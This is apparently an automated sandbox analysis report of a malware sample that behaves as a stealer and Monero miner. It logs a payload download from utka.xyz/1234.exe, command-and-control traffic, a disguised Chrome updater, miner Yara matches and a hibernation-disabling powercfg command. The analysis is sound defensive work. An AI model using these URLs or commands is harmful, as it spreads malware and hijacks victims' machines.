Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401BE3C FindFirstFileExW,	0_2_00000125D401BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88ABE3C FindFirstFileExW,	24_2_000001F6C88ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890BE3C FindFirstFileExW,	24_2_000001F6C890BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90BE3C FindFirstFileExW,	27_2_00000261AC90BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761BE3C FindFirstFileExW,	28_2_000001F02761BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40BE3C FindFirstFileExW,	29_2_000002311E40BE3C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.3.235:443 -> 192.168.11.30:49779

Performs DNS queries to domains with low reputation

Source:

DNS query: utka.xyz

Source: global traffic

TCP traffic: 192.168.11.30:49781 -> 89.23.100.233:3

Source: global traffic	HTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic

Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.11.30:54743 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233

Source: global traffic	HTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: utka.xyz
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 229.116.3.0.in-addr.arpa

Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: zufmUwylvo.exe, 00000000.00000002.11912723601.00000125D3329000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11641294350.00000216F15D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: zufmUwylvo.exe, 00000000.00000002.11840061195.00000125B8FC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11641294350.00000216F15D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzu
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzu
Source: powershell.exe, 00000015.00000002.11643879616.00000216F18FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.11643116501.00000216F1798000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpXzu
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXzu
Source: powershell.exe, 00000015.00000002.11618898711.00000216DA5BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/FleshStealer
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utka.xyz
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utka.xyz/1234.exe
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: zufmUwylvo.exe, 00000000.00000002.11912723601.00000125D338E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443

Source: unknown

HTTPS traffic detected: 84.32.84.151:443 -> 192.168.11.30:49775 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00
Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

PE file contains section with special chars

Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .e;T
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ."Ki
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ..>f
Source: updater.exe.1.dr	Static PE information: section name: .e;T
Source: updater.exe.1.dr	Static PE information: section name: ."Ki
Source: updater.exe.1.dr	Static PE information: section name: ..>f

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process Stats: CPU usage > 6%
Source: C:\Windows\System32\svchost.exe	Process Stats: CPU usage > 6%

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D40130B4 GetProcessHeap,RtlAllocateHeap,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,	0_2_00000125D40130B4
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4012CDC NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	0_2_00000125D4012CDC
